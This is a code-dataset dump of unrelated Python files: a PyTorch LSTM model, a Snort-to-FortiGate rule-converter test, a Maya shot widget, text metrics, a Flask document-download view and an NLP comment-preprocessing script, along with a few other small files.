data['learningStreamLearningPractices']\n del data['learningStreamLearningPractices']\n if data.get('learningStreamTags'):\n data['tags'] = data['learningStreamTags']\n del data['learningStreamTags']\n\nclass LearningStreamTagsSchema(ma.ModelSchema):\n learningStream = fields.Nested('LearningStreamSchema',\n exclude = ('learningStreamTags', 'tags',\n 'learningStreamLearningPractices', 'learningPractices') )\n tag = fields.Nested('TagSchema', \n exclude = ('learningPoints', 'learningPointTags', \n 'episodes', 'episodeTags', \n 'learningPracticesTags', 'learningPractices',\n 'learningStreamTags', 'learningStreams'))\n class Meta:\n model = LearningStreamTags\nclass LearningStreamLearningPracticesSchema(ma.ModelSchema):\n learningPractice = fields.Nested('LearningPracticeSchema',\n exclude = ('learningStreams', 'learningStreamLearningPractices'))\n learningStream = fields.Nested('LearningStreamSchema',\n exclude= ('learningPractices', 'learningStreamLearningPractices')\n )\n class Meta:\n model = LearningStreamLearningPractices\n\n","sub_path":"src/utils/marshmallow/learning_stream_schema.py","file_name":"learning_stream_schema.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"421884964","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# Model based on CellNuclei.ipynb reference [1]\n\nclass RNNet(nn.Module):\n def __init__(self):\n super().__init__()\n # (Batch_size, hidden_size = 3, seq_len = 196)\n batch_size = 64\n pad11 = samePad(5, 1)\n self.conv11 = nn.Conv1d(in_channels = 3, out_channels = 48, kernel_size = 5, padding = pad11)\n nn.init.kaiming_normal_(self.conv11.weight)\n # (Batch_size, 48, 196)\n pad21 = samePad(5, 1)\n self.conv21 = nn.Conv1d(in_channels = 48, out_channels = 64, kernel_size = 5, padding = pad21)\n nn.init.kaiming_normal_(self.conv21.weight)\n# (Batch_size, 64, 196)\n pad31 = samePad(3, 1)\n self.conv31 = nn.Conv1d(in_channels = 64, out_channels = 96, kernel_size = 3, padding = pad31)\n nn.init.kaiming_normal_(self.conv31.weight)\n #(Batch_size, 96, 196)\n self.lstm41 = nn.LSTM(input_size= 96, hidden_size = 48, dropout = 0.0, bidirectional = True)\n\n self.lstm51 = nn.LSTM(input_size = 96, hidden_size = 48, dropout = 0.0, bidirectional = True)\n\n self.forward61 = nn.Linear(18816, batch_size)\n nn.init.kaiming_normal_(self.forward61.weight)\n\n self.forward71 = nn.Linear(batch_size, 5)\n nn.init.kaiming_normal_(self.forward71.weight)\n\n\n def forward(self, x):\n batch_size = 64\n x1 = self.conv11(x)\n x2 = self.conv21(F.tanh(x1))\n x3 = self.conv31(F.tanh(x2))\n\n # Turn (batch_size x hidden_size x seq_len) back into (seq_len x batch_size x hidden_size) for RNN\n x_rnn = x3.transpose(1, 2).transpose(0, 1)\n\n output4, (x4_hidden, x4_cell) = self.lstm41(x_rnn)\n output5, (x5_hidden, x5_cell) = self.lstm51(output4, (x4_hidden, x4_cell))\n\n seq_len, batch, out = output5.size()\n out_transpose = output5.transpose(1, 2)\n\n out_same = out_transpose.contiguous()\n x_forward = out_same.view(seq_len*out, batch)\n x_f = x_forward.transpose(0, 1)\n\n x6 = self.forward61(x_f)\n x7 = self.forward71(F.tanh(x6))\n\n x_out = F.softmax(x7)\n\n return x_out\n\ndef samePad(filterSize, stride):\n return int(float(filterSize - stride)/2)\n","sub_path":"rnn_lstm.py","file_name":"rnn_lstm.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"289689256","text":"#!/usr/bin/env python\nimport unittest\nimport os\nimport sys\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\nsys.path.insert(0, os.path.dirname(script_dir))\nfrom snort2fortigate import test_convert\n\nclass TestSnort2Fortigate(unittest.TestCase):\n\t\t\n def testConvert(self):\t\n ifh = open(os.path.join(script_dir, 'snort_custom.rules'), 'r')\n assertfh = open(os.path.join(script_dir, 'assert_fgt.rules'), 'r')\n in_f = ifh.read().splitlines()\n assert_f = assertfh.read().splitlines()\n for i, rule in enumerate(in_f):\n result = test_convert(rule)\n self.assertEqual(result[1].rstrip(), assert_f[i].rstrip())\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/test_snort2fortigate.py","file_name":"test_snort2fortigate.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"548127769","text":"'''\n@package: shottool\n@author: Trevor van Hoof\n'''\ntry:\n\tfrom PySide.QtCore import *\n\tfrom PySide.QtGui import *\nexcept:\n\ttry:\n\t\tfrom PyQt4.QtCore import *\n\t\tfrom PyQt4.QtGui import *\n\texcept:\n\t\traise ImportError('PyQt4 and PySide both not found, install either library to use this tool.\\n'\n'Go to http://qt-project.org/wiki/Category:LanguageBindings::PySide::Downloads and look under \"Binaries\" for your platform.')\n\nfrom maya import cmds\n\n\nclass InteractiveShotWidget(QWidget):\n\t'''\n\tShows a visualization of a given shot model.\n\tShows which shot is the currently visible shot based on the current time.\n\t'''\n\tdef __init__(self, parent, shotmodel):\n\t\t'''\n\t\t@param parent: QWidget, the parent widget.\n\t\tSince PySide is unsafe when using NULL parents this argument is required.\n\t\t@param shotmodel: ShotModel, the model to visualize.\n\t\t'''\n\t\tsuper(InteractiveShotWidget, self).__init__(parent)\n\t\tself.__model = shotmodel\n\t\tcmds.scriptJob(timeChange=self.paintEvent)\n\t\t\n\tdef paintEvent(self, event):\n\t\tif self.__model.rowCount() < 2:\n\t\t\treturn\n\t\t\n\t\tpainter = QPainter(self)\n\t\t\n\t\tfirst = int(self.__model.item(0, 1).text())\n\t\tlast = int(self.__model.item(self.__model.rowCount()-1, 2).text())\n\t\tduration = last - first + 1\n\t\t\n\t\tusedcameras = self.__model.usedCameras()\n\t\tnumrows = len(usedcameras)\n\t\t\n\t\twidth = self.geometry().width()\n\t\theight = self.geometry().height()\n\t\tystep = height / numrows\n\t\tfor i in range(self.__model.rowCount()):\n\t\t\tname = str(self.__model.item(i, 0).text())\n\t\t\tstart = int(self.__model.item(i, 1).text())\n\t\t\tend = int(self.__model.item(i, 2).text())\n\t\t\tlength = end - start + 1\n\t\t\tcamera = self.__model.getCameraPath(i)\n\t\t\t\n\t\t\tcurtime = int(cmds.currentTime(q=True))\n\t\t\tif curtime >= start and curtime <= end:\n\t\t\t\tpainter.setBrush(QColor(51, 140, 179))\n\t\t\telse:\n\t\t\t\tpainter.setBrush(QColor(51, 140, 179, 100))\n\t\t\tpainter.setPen(Qt.NoPen)\n\t\t\t\n\t\t\tarea = QRect(width * (start - first) / float(duration),\n\t\t\t\tusedcameras.index(camera) * ystep,\n\t\t\t\twidth * length / float(duration), \n\t\t\t\tystep)\n\t\t\tpainter.drawRect(area)\n\t\t\t\n\t\t\tpainter.setPen(QColor(0,0,0))\n\t\t\tpainter.drawText(area, 'Shot %s: %s'%(i, name))\n\t\t\n\t\tpainter.setPen(Qt.NoPen)\n\t\tpainter.setBrush(Qt.red)\n\t\tpainter.drawRect(width * (cmds.currentTime(q=True) - first) / float(duration), 0, 2, height)","sub_path":"shottool/interactiveshotwidget.py","file_name":"interactiveshotwidget.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"492104275","text":"from server.server import *\nfrom server.pluginAPI import *\nfrom server.strings import *\n\n\nSERVER_DEFAULT_PORT = 1337\n\nclass CliServer(StringsServer):\n\tdef __init__(self, port):\n\t\tServer.__init__(self, \"0.0.0.0\", port)\n\n\ndef main():\n\tserver = CliServer(SERVER_DEFAULT_PORT)\n\tserver.serve()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"90308535","text":"from typing import List, Dict, Tuple, Callable, Iterable\n\nimport numpy as np\nimport sacrebleu\nfrom rouge_score import rouge_scorer, scoring\nfrom transformers import EvalPrediction, PreTrainedTokenizer\n\nfrom sentence_splitter import add_newline_to_end_of_each_sentence\n\n# ROUGE_KEYS = [\"rouge1\", \"rouge2\", \"rougeL\", \"rougeLsum\"]\nROUGE_KEYS = [\"rouge1\"]\n\n\ndef calculate_bleu(candidate: str, refs: List[str], **kwargs) -> dict:\n return {\"bleu\": round(sacrebleu.compat.sentence_bleu(candidate, refs, **kwargs).score / 100, 4)}\n\n\ndef calculate_rouge(\n pred_lns: List[str],\n tgt_lns: List[str],\n use_stemmer=True,\n rouge_keys=ROUGE_KEYS,\n return_precision_and_recall=False,\n bootstrap_aggregation=True,\n newline_sep=True,\n) -> Dict:\n \"\"\"Calculate rouge using rouge_scorer package.\n Args:\n pred_lns: list of summaries generated by model\n tgt_lns: list of groundtruth summaries (e.g. contents of val.target)\n use_stemmer: Bool indicating whether Porter stemmer should be used to\n strip word suffixes to improve matching.\n rouge_keys: which metrics to compute, defaults to rouge1, rouge2, rougeL, rougeLsum\n return_precision_and_recall: (False) whether to also return precision and recall.\n bootstrap_aggregation: whether to do the typical bootstrap resampling of scores. Defaults to True, if False\n this function returns a collections.defaultdict[metric: list of values for each observation for each subscore]``\n newline_sep:(default=True) whether to add newline between sentences. This is essential for calculation rougeL\n on multi sentence summaries (CNN/DM dataset).\n Returns:\n Dict[score: value] if aggregate else defaultdict(list) keyed by rouge_keys\n \"\"\"\n scorer = rouge_scorer.RougeScorer(rouge_keys, use_stemmer=use_stemmer)\n aggregator = scoring.BootstrapAggregator()\n for pred, tgt in zip(pred_lns, tgt_lns):\n # rougeLsum expects \"\\n\" separated sentences within a summary\n if newline_sep:\n pred = add_newline_to_end_of_each_sentence(pred)\n tgt = add_newline_to_end_of_each_sentence(tgt)\n scores = scorer.score(pred, tgt)\n aggregator.add_scores(scores)\n\n if bootstrap_aggregation:\n result = aggregator.aggregate()\n if return_precision_and_recall:\n return extract_rouge_mid_statistics(result) # here we return dict\n else:\n return {k: round(v.mid.fmeasure * 100, 4) for k, v in result.items()}\n\n else:\n return aggregator._scores # here we return defaultdict(list)\n\n\ndef extract_rouge_mid_statistics(dct):\n new_dict = {}\n for k1, v1 in dct.items():\n mid = v1.mid\n new_dict[k1] = {\n stat: round(getattr(mid, stat), 4) for stat in [\"precision\", \"recall\", \"fmeasure\"]\n }\n return new_dict\n\n\nif __name__ == '__main__':\n pred = \"first string a a a\"\n ref = [\"second string b b b\"]\n print(calculate_bleu(pred, ref))\n","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384248572","text":"from google.colab import drive\nfrom torch.utils.tensorboard import SummaryWriter\nimport os\nimport numpy as np\nimport glob\nimport torchvision\nimport torch\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nimport matplotlib.pyplot as plt\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nimport torch.functional as F\nimport torch.autograd as autograd\nfrom model import *\nfrom util import *\nimport argparse\nfrom torch.autograd import Variable\nfrom train import *\n\n\n# Parser 생성하기\nparser = argparse.ArgumentParser(description='Human motion classification', \n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nparser.add_argument('--lr', default=1e-3, type=float, dest='lr')\nparser.add_argument('--batch_size', default=4, type=int, dest='batch_size')\nparser.add_argument('--num_epoch', default=400, type=int, dest='num_epoch')\n\nparser.add_argument('--train_data_dir', default='/content/drive/My Drive/human_motion/traindata', type=str, dest='train_data_dir')\nparser.add_argument('--test_data_dir', default='/content/drive/My Drive/human_motion/testdata', type=str, dest='test_data_dir')\nparser.add_argument('--lstm_ckpt_dir', default='/content/drive/My Drive/human_motion/checkpoint', type=str, dest='lstm_ckpt_dir')\nparser.add_argument('--lstm_log_dir', default='/content/drive/My Drive/human_motion/log', type=str, dest='lstm_log_dir')\nparser.add_argument('--lstm_figure_dir', default='/content/drive/My Drive/human_motion/figure', type=str, dest='lstm_figure_dir')\nparser.add_argument('--oversampling_ckpt_dir', default='/content/drive/My Drive/human_motion/checkpoint', type=str, dest='oversampling_ckpt_dir')\nparser.add_argument('--oversampling_log_dir', default='/content/drive/My Drive/human_motion/log', type=str, dest='oversampling_log_dir')\nparser.add_argument('--oversampling_figure_dir', default='/content/drive/My Drive/human_motion/figure', type=str, dest='oversampling_figure_dir')\nparser.add_argument('--weight_balancing_ckpt_dir', default='/content/drive/My Drive/human_motion/checkpoint', type=str, dest='weight_balancing_ckpt_dir')\nparser.add_argument('--weight_balancing_log_dir', default='/content/drive/My Drive/human_motion/log', type=str, dest='weight_balancing_log_dir')\nparser.add_argument('--weight_balancing_figure_dir', default='/content/drive/My Drive/human_motion_figure', type=str, dest='weight_balancing_figure_dir')\nparser.add_argument('--feature_gan_ckpt_dir', default='/content/drive/My Drive/human_motion/checkpoint', type=str, dest='feature_gan_ckpt_dir')\nparser.add_argument('--feature_gan_log_dir', default='/content/drive/My Drive/human_motion/log', type=str, dest='feature_gan_log_dir')\nparser.add_argument('--lstm_retrain_ckpt_dir', default='/content/drive/My Drive/human_motion/checkpoint', type=str, dest='lstm_retrain_ckpt_dir')\nparser.add_argument('--lstm_retrain_log_dir', default='/content/drive/My Drive/human_motion/log', type=str, dest='lstm_retrain_log_dir')\nparser.add_argument('--lstm_retrain_figure_dir', default='/content/drive/My Drive/human_motion/figure', type=str, dest='lstm_retrain_figure_dir')\n\nparser.add_argument('--sequence_length', default=100, type=int, dest='sequence_length')\nparser.add_argument('--input_size', default=60, type=int, dest='input_size')\nparser.add_argument('--num_lstm', default=1, type=int, dest='num_lstm')\nparser.add_argument('--lstm_hidden_size', default=100, type=int, dest='lstm_hidden_size')\nparser.add_argument('--fg_hidden_size', default=50, type=int, dest='fg_hidden_size')\nparser.add_argument('--num_classes', default=12, type=int, dest='num_classes')\nparser.add_argument('--dropout', default=0.2, type=float, dest='dropout')\nparser.add_argument('--latent_size', default=10, type=int, dest='latent_size')\n\nparser.add_argument('--mode', default='train', type=str, dest='mode')\nparser.add_argument('--unbalancing_rate', default=1.0, type=float, dest='unbalancing_rate')\nparser.add_argument('--train_continue', default='off', type=str, dest='train_continue')\n\n\nPARSER = Parser(parser)\n\ndef main():\n ARGS = PARSER.get_arguments()\n PARSER.print_args()\n\n TRAINER = Train(ARGS)\n\n if ARGS.mode == 'lstm':\n TRAINER.lstm()\n elif ARGS.mode == 'oversampling':\n TRAINER.lstm()\n elif ARGS.mode == 'weight_balancing':\n TRAINER.lstm()\n elif ARGS.mode == 'feature_gan':\n TRAINER.feature_gan()\n elif ARGS.mode == 'lstm_retrain':\n TRAINER.lstm_retrain()\n else:\n print('='*40)\n print('The entered \"mode\" does not exist')\n print('='*40)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"645907648","text":"'''\n조세퍼스 문제 0\n시간 제한\t메모리 제한\t제출\t정답\t맞은 사람\t정답 비율\n2 초\t512 MB\t6371\t3621\t3167\t58.987%\n문제\n조세퍼스 문제는 다음과 같다.\n\n1번부터 N번까지 N명의 사람이 원을 이루면서 앉아있고, 양의 정수 K(≤ N)가 주어진다.\n이제 순서대로 K번째 사람을 제거한다.\n한 사람이 제거되면 남은 사람들로 이루어진 원을 따라 이 과정을 계속해 나간다.\n이 과정은 N명의 사람이 모두 제거될 때까지 계속된다.\n원에서 사람들이 제거되는 순서를 (N, K)-조세퍼스 순열이라고 한다.\n예를 들어 (7, 3)-조세퍼스 순열은 <3, 6, 2, 7, 5, 1, 4>이다.\n\nN과 K가 주어지면 (N, K)-조세퍼스 순열을 구하는 프로그램을 작성하시오.\n\n입력\n첫째 줄에 N과 K가 빈 칸을 사이에 두고 순서대로 주어진다. (1 ≤ K ≤ N ≤ 1,000)\n\n출력\n예제와 같이 조세퍼스 순열을 출력한다.\n\n예제 입력 1\n7 3\n예제 출력 1\n<3, 6, 2, 7, 5, 1, 4>\n출처\n문제를 만든 사람: baekjoon\n'''\n# n, k = 10, 3\nn, k = map(int,input().split())\n\nqueue = [i for i in range(1,n+1)]\njosephus = []\npos = 0\nwhile queue:\n pos = (pos+k-1) % len(queue)\n josephus.append(str(queue.pop(pos)))\n\nprint('<'+', '.join(josephus)+'>')\n","sub_path":"python3/boj/queue/11866_조세퍼스_문제_0.py","file_name":"11866_조세퍼스_문제_0.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"157428719","text":"from setuptools import setup, find_packages\n\ninstall_requires = [\n 'numpy',\n 'tensorflow',\n 'matplotlib',\n]\n\nsetup(\n name = \"tensorlayer\",\n version = \"1.1\",\n include_package_data=True,\n author='TensorLayer Contributors',\n author_email='hao.dong11@imperial.ac.uk',\n url = \"https://github.com/zsdonghao/tensorlayer\" ,\n license = \"apache\" ,\n packages = find_packages(),\n install_requires=install_requires,\n # scripts=['tutorial_mnist.py'],\n description = \"Deep learning and Reinforcement learning library for Researchers and Engineers\",\n keywords = \"deep learning, reinforcement learning, tensorflow\",\n platform=['any'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"501292491","text":"# https://programmers.co.kr/learn/courses/30/lessons/68935\r\n\r\ndef solution(n):\r\n a = \"\"\r\n while n:\r\n a += str(n%3)\r\n n//=3\r\n a = a[::-1]\r\n\r\n ans = 0\r\n for i in range(len(a)):\r\n ans += int(a[i]) * (3**i)\r\n return ans\r\nprint(solution(125))\r\n","sub_path":"Level 1/3진법 뒤집기.py","file_name":"3진법 뒤집기.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"624582878","text":"import requests\nfrom flask import abort, current_app, render_template, request\nfrom notifications_python_client.errors import HTTPError\n\nfrom app import service_api_client\nfrom app.main import main\nfrom app.utils import assess_contact_type\n\n\n@main.route('/_status')\ndef status():\n return \"ok\", 200\n\n\n@main.route('/d//', methods=['GET'])\ndef landing(service_id, document_id):\n key = request.args.get('key', None)\n if not key:\n abort(404)\n\n try:\n service = service_api_client.get_service(service_id)\n except HTTPError as e:\n abort(e.status_code)\n\n service_contact_info = service['data']['contact_link']\n contact_info_type = assess_contact_type(service_contact_info)\n\n if not _get_document_metadata(service_id, document_id, key):\n return render_template(\n 'views/file_unavailable.html',\n service_name=service['data']['name'],\n service_contact_info=service_contact_info,\n contact_info_type=contact_info_type,\n )\n\n return render_template(\n 'views/index.html',\n service_id=service_id,\n service_name=service['data']['name'],\n service_contact_info=service_contact_info,\n contact_info_type=contact_info_type,\n document_id=document_id,\n key=key\n )\n\n\n@main.route('/d///download', methods=['GET'])\ndef download_document(service_id, document_id):\n key = request.args.get('key', None)\n if not key:\n abort(404)\n\n try:\n service = service_api_client.get_service(service_id)\n except HTTPError as e:\n abort(e.status_code)\n\n metadata = _get_document_metadata(service_id, document_id, key)\n service_contact_info = service['data']['contact_link']\n contact_info_type = assess_contact_type(service_contact_info)\n\n if not metadata:\n return render_template(\n 'views/file_unavailable.html',\n service_name=service['data']['name'],\n service_contact_info=service_contact_info,\n contact_info_type=contact_info_type,\n )\n\n return render_template(\n 'views/download.html',\n download_link=metadata['direct_file_url'],\n service_name=service['data']['name'],\n service_contact_info=service_contact_info,\n contact_info_type=contact_info_type,\n )\n\n\ndef _get_document_metadata(service_id, document_id, key):\n check_file_url = '{}/services/{}/documents/{}/check?key={}'.format(\n current_app.config['DOCUMENT_DOWNLOAD_API_HOST_NAME'],\n service_id,\n document_id,\n key\n )\n response = requests.get(check_file_url)\n\n if response.status_code == 400:\n error_msg = response.json().get('error', '')\n # If the decryption key is missing or can't be decoded using `urlsafe_b64decode`,\n # the error message will contain 'decryption key'.\n # If the decryption key is wrong, the error message is 'Forbidden'\n if 'decryption key' in error_msg or 'Forbidden' in error_msg:\n abort(404)\n\n # Let the `500` error handler handle unexpected errors from doc-download-api\n response.raise_for_status()\n\n return response.json().get('document')\n","sub_path":"app/main/views/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"415143416","text":"import sys\nimport argparse\nimport os\nimport json\nimport html\nimport string\nimport re\nimport unicodedata\nimport spacy\nfrom spacy.tokens import Doc\n\n# region Constants and Builder Functions\n\n# CDF data directory\nindir = '/u/cs401/A1/data/'\n\n# CDF wordlists directory\nwordlists_dir = \"/u/cs401/Wordlists\"\n\n\ndef build_clitic_regex():\n \"\"\"\n Builds a regex to capture the clitics specified in the assignment handout.\n \"\"\"\n return re.compile(\"(\" + \"|\".join(\n [\n # Clitics with starting apostrophe have trailing whitespace\n f\"{left_clitic}\\s+\"\n for left_clitic in\n [\"'d\", \"'n\", \"'ve\", \"'re\", \"'ll\", \"'m\", \"'s\"]\n ] + [\n # Clitics with ending apostrophe have leading whitespace\n f\"\\s+{right_clitic}\"\n for right_clitic in\n [\"t'\", \"y'\"]\n ] + [\n \"s'\\s*\", # Plural possessive clitic\n \"n't\\s*\" # not -> n't contraction\n ]\n ) + \")\", flags=re.IGNORECASE)\n\n\ndef build_abbrev_regex():\n \"\"\"\n Builds a regex to capture the abbreviations specified in the assignment handout.\n \"\"\"\n abbrev_path = os.path.join(wordlists_dir, \"abbrev.english\")\n with open(abbrev_path, \"r\") as abbrev_file:\n abbreviations = [\n line.strip()\n for line in abbrev_file.readlines()\n ]\n return re.compile(\"|\".join(re.escape(x) for x in abbreviations))\n\n\ndef build_punc_regex():\n \"\"\"\"\n Builds a regex to capture punctuation characters.\n \"\"\"\n return re.compile(\"|\".join(\n re.escape(x) for x in string.punctuation\n ))\n\n\ndef build_multi_punc_regex():\n \"\"\"\"\n Builds a regex to capture multiple punctuation characters.\n \"\"\"\n base_regex = build_punc_regex()\n return re.compile(f\"({base_regex.pattern}){{2,}}\")\n\n\ndef build_nlp():\n \"\"\"\n Builds the Spacy NLP processor needed for the preprocessing.\n \"\"\"\n return spacy.load(\"en\", disable=[\"parser\", \"ner\"])\n\n\ndef build_stopwords():\n \"\"\"\n Builds a set of stopwords as specified in the assignment handout.\n \"\"\"\n stopwords_path = os.path.join(wordlists_dir, \"StopWords\")\n with open(stopwords_path, mode=\"r\") as file:\n return {\n line.strip()\n for line in file.readlines()\n }\n\n\n# Obtained from http://www.noah.org/wiki/RegEx_Python#URL_regex_pattern\nurl_regex = re.compile(\n \"http[s]?:\\/\\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+\"\n)\n\nabbrev_regex = build_abbrev_regex()\n\npunc_regex = build_punc_regex()\n\nmulti_punc_regex = build_multi_punc_regex()\n\nclitic_regex = build_clitic_regex()\n\nnlp = build_nlp()\n\nstopwords = build_stopwords()\n\n\n# endregion\n\n\n# region Helper Functions\n\ndef spacy_tokens(string):\n \"\"\"\n Returns a list of Spacy Token objects.\n Accomplished as as instructed in tutorial\n http://www.cs.toronto.edu/~frank/csc401/tutorials/csc401_A1_tut2.pdf\n SLIDE 16\n \"\"\"\n doc = spacy.tokens.Doc(nlp.vocab, words=string.split())\n return nlp.tagger(doc)\n\n\n# endregion\n\n# region Process Steps\n\n\ndef remove_newlines(string):\n \"\"\"(str) -> str\n Replaces newlines \"\\n\" in string with a space \" \",\n then strips off leading and trailing whitespace.\n\n :param string: some input string\n :return: string where \"\\n\" is replaced with \" \"\n\n \"\"\"\n return string \\\n .replace(\"\\n\", \" \") \\\n .strip()\n\n\ndef replace_html_codes(string):\n \"\"\"(str) -> str\n\n Replaces all HTML character codes in string with\n their ASCII equivalent.\n\n Sources:\n https://stackoverflow.com/questions/16467479/normalizing-unicode\n https://stackoverflow.com/questions/20078816/replace-non-ascii-characters-with-a-single-space\n https://stackoverflow.com/questions/44431730/how-to-replace-accented-characters-in-python\n\n :param string: some input string\n :return: string with each HTML character converted to ASCII\n \"\"\"\n\n unicode_str = html.unescape(string)\n\n return unicodedata.normalize(\"NFD\", unicode_str) \\\n .encode(\"ascii\", \"ignore\") \\\n .decode(\"utf-8\") \\\n .encode(\"ascii\", \"ignore\") \\\n .decode()\n\n\ndef remove_urls(string):\n \"\"\"\n Removes all URLs from string.\n\n URLs are defined as tokens (space separated)\n that start with \"www\" or \"http\".\n\n :param string: some input string\n :return: string, with each URL removed\n \"\"\"\n return url_regex.sub(\" \", string)\n\n\ndef split_punctuation(string):\n \"\"\"\n Accomplishes step 4 of the preprocessing pipeline.\n \"\"\"\n\n # Determine indices of punctuation symbols\n # (that are not apostrophes)\n punc_inds = set(\n ind\n for match in punc_regex.finditer(string)\n if string[match.span()[0]] != \"'\"\n for ind in match.span()\n )\n\n # Remove anything within an abbreviation from consideration\n for match in abbrev_regex.finditer(string):\n start, end = match.span()\n for i in range(start, end + 1):\n punc_inds.discard(i)\n\n # Remove the indices within multiple punctuations\n for match in multi_punc_regex.finditer(string):\n start, end = match.span()\n for i in range(start + 1, end):\n punc_inds.discard(i)\n\n # Insert spaces in front of the targeted indices\n return \"\".join([\n f\" {char}\" if i in punc_inds else char\n for (i, char) in enumerate(string)\n ])\n\n\ndef split_clitics(string):\n \"\"\"\n Accomplishes step 5 of the preprocessing pipeline.\n \"\"\"\n\n def clitic_replacer(match):\n\n # Get rid of trailing spaces for easier analysis\n clitic = match.group().strip()\n\n # Special case: inject space for plural possessive\n if clitic == \"s'\":\n return \"s '\"\n else:\n return f\" {clitic} \"\n\n return re.sub(clitic_regex,\n clitic_replacer,\n string)\n\n\ndef spacy_tagging(string,\n add_tags,\n remove_stopwords,\n lemmatize,\n split_sentences,\n to_lowercase):\n \"\"\"\n Accomplishes steps 6-10 of the preprocessing pipeline.\n These are all done in one function to avoid overhead from calling Spacy multiple times.\n This function only needs to call Spacy once.\n\n :param string: input string\n\n :param add_tags: whether or not to add Spacy's POS tags to words (step 6)\n\n :param remove_stopwords: whether or not to remove stopwords (step 7)\n\n :param lemmatize: whether or not to lemmatize the Spacy tokens (step 8)\n\n :param split_sentences: whether or not to newline split sentences (step 9)\n\n :param to_lowercase: whether or not to lowercase the obtained tokens (step 10)\n \"\"\"\n\n sentences = []\n cur_sentence = []\n\n for token in spacy_tokens(string):\n\n # Skip over stopwords if asked (step 7)\n if remove_stopwords and \\\n token.text.lower() in stopwords:\n continue\n\n # Determine the word we want (step 8)\n if lemmatize and (token.lemma_[0] != '-'):\n\n # Handout Pg. 4 says for lemmatization,\n # only take tokens with non-dash beginnings\n word = token.lemma_\n\n else:\n word = token.text\n\n # Determine if word should be lowercased (step 9)\n # (tags should not be lowercased!)\n # https://piazza.com/class/jpzxwr3vuqa1tn?cid=236\n if to_lowercase:\n word = word.lower()\n\n # Determine if we want tags (step 6)\n if add_tags:\n to_add = f\"{word}/{token.tag_}\"\n else:\n to_add = word\n\n # Add the result to the current sentence\n cur_sentence += [to_add]\n\n # If the token we just added was a sentence-closer (.)\n # https://spacy.io/api/annotation -> \".\" is a sentence closer\n if split_sentences and (token.tag_ == \".\"):\n sentences += [cur_sentence]\n cur_sentence = []\n\n # Add any remaining sentences\n sentences += [cur_sentence]\n\n return \"\\n\".join(\n \" \".join(sent)\n for sent in sentences\n )\n\n\n# endregion\n\ndef preproc1(comment, steps=range(1, 11)):\n ''' This function pre-processes a single comment\n\n Parameters: \n comment : string, the body of a comment\n steps : list of ints, each entry in this list corresponds to a preprocessing step \n\n Returns:\n modComm : string, the modified comment \n '''\n\n # For faster containment checking\n step_set = set(steps)\n\n # No steps selected means modComm is empty\n if len(step_set) == 0:\n return \"\"\n\n # Steps were selected, apply them in ORDER\n modComm = comment\n if 1 in step_set:\n modComm = remove_newlines(modComm)\n if 2 in step_set:\n modComm = replace_html_codes(modComm)\n if 3 in step_set:\n modComm = remove_urls(modComm)\n if 4 in step_set:\n modComm = split_punctuation(modComm)\n if 5 in step_set:\n modComm = split_clitics(modComm)\n\n # Steps 6,7,8,9 are accomplished by one function\n # (to only call spacy once)\n if any((i in step_set)\n for i in [6, 7, 8, 9, 10]):\n modComm = spacy_tagging(modComm,\n add_tags=(6 in step_set),\n remove_stopwords=(7 in step_set),\n lemmatize=(8 in step_set),\n split_sentences=(9 in step_set),\n to_lowercase=(10 in step_set))\n\n return modComm\n\n\ndef main(args):\n allOutput = []\n for subdir, dirs, files in os.walk(indir):\n for file in files:\n fullFile = os.path.join(subdir, file)\n print(\"Processing \" + fullFile)\n\n data = json.load(open(fullFile))\n\n # Select appropriate args.max lines\n max_lines = args.max\n start_ind = args.ID[0] % len(data)\n end_ind = start_ind + max_lines\n\n for raw_line_num in range(start_ind, end_ind):\n line_num = raw_line_num % len(data)\n\n # Read comment given line number\n comment = json.loads(data[line_num])\n\n # Add category field (determined by filename)\n comment['cat'] = file\n\n # Replace body with processed version (use default steps)\n comment['body'] = preproc1(comment['body'])\n\n # Add modified comment to \"allOutput\"\n allOutput += [comment]\n\n # Refactored from original to use with statement (auto closes)\n with open(args.output, 'w') as fout:\n fout.write(json.dumps(allOutput))\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Process each .')\n parser.add_argument('ID', metavar='N', type=int, nargs=1,\n help='your student ID')\n\n parser.add_argument(\"-o\", \"--output\",\n help=\"Directs the output to a filename of your choice\",\n type=str,\n 